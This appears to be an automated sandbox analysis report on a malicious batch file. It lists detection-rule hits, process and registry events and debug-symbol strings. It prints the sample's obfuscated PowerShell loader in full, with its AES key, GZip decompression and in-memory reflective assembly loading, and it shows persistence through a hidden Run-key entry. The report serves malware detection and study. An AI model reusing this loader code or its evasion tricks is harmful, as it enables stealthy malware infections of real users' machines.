'$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+'
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+'
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4828, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 4556, ProcessName: schtasks.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/
Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1284, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1284, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: Script Block LoggingAuthor: frack113: Data: EventID: 4104, MessageNumber: 1, MessageTotal: 1, Path: , ScriptBlockId: 0ed46015-449a-42c0-83e2-dd1400a3f7e4, ScriptBlockText: Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden , Source: Microsoft-Windows-PowerShell, data0: 1, data1: 1, data2: Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden , data3: 0ed46015-449a-42c0-83e2-dd1400a3f7e4, data4:
Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 2844, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6332, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 1284, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 1.cmdVirustotal: Detection: 14%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,35_2_00401000
Source: Binary string: System.Configuration.Install.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Drawing.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdbMZ source: WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.pdbame="P@ source: WER3551.tmp.dmp.28.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.pdb( source: WER3551.tmp.dmp.28.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.pdbP source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.pdbP4 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.pdb source: WER604E.tmp.dmp.10.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.pdbH source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbp^y source: WER3551.tmp.dmp.28.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Drawing.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
